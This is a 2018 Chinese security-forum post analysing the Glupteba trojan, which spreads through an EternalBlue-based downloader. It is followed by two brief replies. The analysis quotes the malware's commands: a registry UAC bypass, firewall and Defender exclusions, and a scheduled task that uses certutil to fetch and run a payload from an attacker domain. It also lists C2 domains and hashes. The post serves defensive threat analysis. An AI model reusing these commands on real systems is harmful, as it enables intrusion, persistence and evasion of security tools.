查看: 2544|回复: 2
收起左侧

[分享] Glupteba恶意木马利用“永恒之蓝”漏洞传播 感染量激增

[复制链接]
腾讯电脑管家
发表于 2018-6-1 18:53:56 | 显示全部楼层 |阅读模式
本帖最后由 腾讯电脑管家 于 2018-6-1 20:48 编辑

0×1概述
近日腾讯御见威胁情报中心监测到大量下载Glupteba恶意木马。不同以往的是,该恶意木马并未通过Operation Windigo僵尸网络进行传播,而是通过其他的木马下载器(Scheduled.exe)进行传播。进一步溯源分析发现,该木马下载器利用“永恒之蓝”漏洞进行传播,从而导致了该木马的感染量的激增。

Glupteba木马会绕过UAC,以管理员权限和系统权限运行,会创建防火墙策略,将木马程序加入白名单;修改Windows Defender策略,将木马程序添加到病毒查杀白名单。木马会收集中毒电脑的隐私信息,利用中毒电脑挖矿。
0×2详细分析
scheduled.exe分析:
scheduled.exe首先申请空间,释放PE文件执行。将释放的PE dump出来,发现是golang编写的,利用IDA python脚本将函数重命名。释放的PE首先执行写入配置信息到注册表HEKY_CURRENT_USER/Software/Microsoft/TestApp中。
图1 写入配置信息
然后判断是否是管理员权限,如果不是,则利用写注册表  
"HKCU\Software\Classes\mscfile\shell\open\command"
然后通过启动CompMgmtLauncher绕过UAC以管理员权限重新启动自己。



(运行CompMgmtLauncher)

重启后再判断是否是系统权限,如果不是则通过以TrustedInstaller运行自己提高权限。



(以TrustedInstaller运行)
判断自己路径名是否是"C:\Windows\rss\csrss.exe",如果不是则执行安装逻辑。
首先会判断是否在虚拟机中运行。
(检查VirtualBox)
然后添加防火墙策略,并设置注册表配置firewall键值为1,将程序启动加入Windows防火墙的白名单。
cmd.exe /C "netsh advfirewall firewalladd rule name="csrss" dir=in action=allowprogram="C:\Windows\rss\csrss.exe" enable=yes"
cmd.exe /C "netsh advfirewall firewalladd rule name="CloudNet" dir=in action=allowprogram="C:\Users\admin\AppData\Roaming\EpicNetInc\CloudNet\cloudnet.exe" enable=yes"
创建其他释放文件相关目录,并写入注册表
"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsDefender\Exclusions\"的paths和processs下的子健。并且设置注册表配置defender键值为1。
(创建目录文件夹)
最后将自身移动到”C:\Windows\rss\”下,重命名”csrss.exe”,设置文件夹隐藏,并设置注册表Software\Microsoft\Windows\CurrentVersion\RUN,最后重新启动csrss.exe。

(设置自启)
重启后再向服务器注册bot将服务器返回数据再写入注册表配置UUID(后续下载的CloudNet启动需要)。
(注册bot)
注册bot完成后创建两个任务分别用于执行自己和更新自己。

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR"C:\Windows\rss\csrss.exe" /TN csrss /F
schtasks /CREATE /SC ONLOGON /RL HIGHEST /RUSYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -fhttp://dp.fastandcoolest.com/scheduled.exeC:\Users\admin\AppData\Local\Temp\csrss\scheduled.exe &&C:\Users\admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TNScheduledUpdate /F
然后再释放3个sys文件和1个exe文件到目标目录设置隐藏属性,并加载驱动和exe。"C:\Windows\System32\drivers\"下释放三个隐藏sys文件:

Winmon.sys用于隐藏对应PID进程。

WinmonFS.sys隐藏指定文件或目录。

WinmonProcessMonitor.sys查找指定进程,并关闭。
(WinmonFS.sys隐藏文件)
C:\Windows\下释放一个exe文件:
Windefender.exe
添加规则到windows defender。
cmd.exe /C scsdset WinmonD:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
cmd.exe /C scsdset WinmonFS D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
cmd.exe /C scsdset WinmonProcessMonitorD:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
添加完规则后,会将服务器返回cloudnet.exe下载地址"http[:]//skynetstop.com/cloudnet.exe"写入到注册表配置信息中的CloudenetSource中,然后开启六个线程。
(创建线程)
六个线程分别作用是:
1.监测服务更新
2.监测保护CloudNet
3.监测保护Defender
4.下载矿机和挖矿代{过}{滤}理配置信息
5.监测全屏窗口时则下载其他软件安装
6.获取掩码利用永恒之蓝攻击局域网机器
(第三方软件下载器)
(下载窃取浏览器个人数据插件)
(矿机)
(永恒之蓝payload模块下载app.exe)
开启线程后,再等待服务器指令,执行其他功能,例如上传下载执行等功能。

(部分功能函数)
Windefender.exe分析:

windefender.exe同样是由golang编写,首先将自己写入windows defender规则。

cmd.exe /C scsdset WinDefenderD:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
然后获取注册表配置信息CloudenetSource,去下载执行Cloudnet.exe。



(下载Cloudnet.exe)
Cloudnet分析:

首先读取注册表配置信息中的UUID并校检。

(读取UUID)

移动自己到目的文件夹下。

(移动自身)
写注册表自启动后继续在注册表

“HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\CloudNet”下写入文件版本信息,路径等信息。

(设置自启)
设置注册表完后,会访问www.google.com判断是否联网,随后在从100条硬编码中随机选择一条并解密生成拼接成c2服务器。向该c2服务器发送信息。
(第一次发送信息)
随后会继续向c2服务器发送更详细的本地信息。

(第二次发送本地信息)

随后服务器会向受害机器发送验证通信信息。


(bot与C2认证)
e为服务器向受害者机器发送的控制指令。


(接收指令执行)



0×3关联分析
分析发现,cloudnet.exe原来是Glupteba恶意木马,Glupteba恶意木马作为Operation Windigo组织用于部署僵尸网络中的一部分首次出现,Operation Windigo组织通过Glupteba创建代{过}{滤}理分发垃圾邮件。

此次发现的Glupteba虽然功能没有太大变化,但是与以往通过Operation Windigo基础设施分发下载不同,而是利用其他恶意木马进行分发下载,并且作为主模块使用,我们有理由相信Glupteba脱离Operation Windigo,成为自己僵尸网络的一部分。
观察过程中目前尚未发现Glupteba有其他动作,不排除僵尸网络背后的操纵者出售地下服务,可用于垃圾邮件分发或者网络攻击等行为。





0×4解决方案
腾讯御见威胁情报中心提醒用户注意以下几点:
1、服务器关闭不必要的端口,方法可参考:https://guanjia.qq.com/web_clinic/s8/585.html
2、推荐企业用户安装御点终端安全管理系统(https://s.tencent.com/product/yd/index.html)。御点终端安全管理系统具备终端杀毒统一管控、修复漏洞统一管控,以及策略管控等全方位的安全管理功能,可帮助企业管理者全面了解、管理企业内网安全状况、保护企业安全。




IOC

C2:

https[:]//blumbergnew.com

https[:]//fastandcoolest.com







http[:]//e8ebf79d-5dd2-4d98-9c45-e3231e8cc26c.server-17.0m1.ru

URL:












MD5:

4ef0c39e632279d7b3672d2efc071e5b

0d3a8d67cd969c6e096b4d29e910dd9e

622fd523a87cb55be0b676a70c64e8f8

c626f99579c00a2e86b89c566eb1487a

0acbe358eac81eca5e05ac1ca6f9484a

954f2536b9c314ab0e98543445c1c9da

ad51151ac0ce51c2f96f40eec6f13f70

3eda353ae833e9c79a5c01c40505892b

e3ab3302877551b0211641798a8f17a1

611601b4bab6794ffab44877ce5a3555

b4c4c660f3479e6149aafa46634b210e

ed82b0352481bdb870a2feef7094f767

057994209bbde8a07786bcb5cf02cedf

580e347d6422565d5ac412980ca00bd1

de5b3710b5cbdef975216f6043727a36

a9bf973249a76b214b38a5483544709f

2262802fadaf196687d35cd787092b14

b9e69cfdc4ee4bff6169c8a2dc062750










本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
ghostByWolf
发表于 2018-6-5 17:24:54 | 显示全部楼层
然而国内连接不到
www.google.com  23333
他应该检测能不能连接到www.baidu.com
ssama
发表于 2018-6-5 18:52:32 | 显示全部楼层
打了补丁的用户无所畏惧
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-11-21 20:34 , Processed in 0.132684 second(s), 17 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表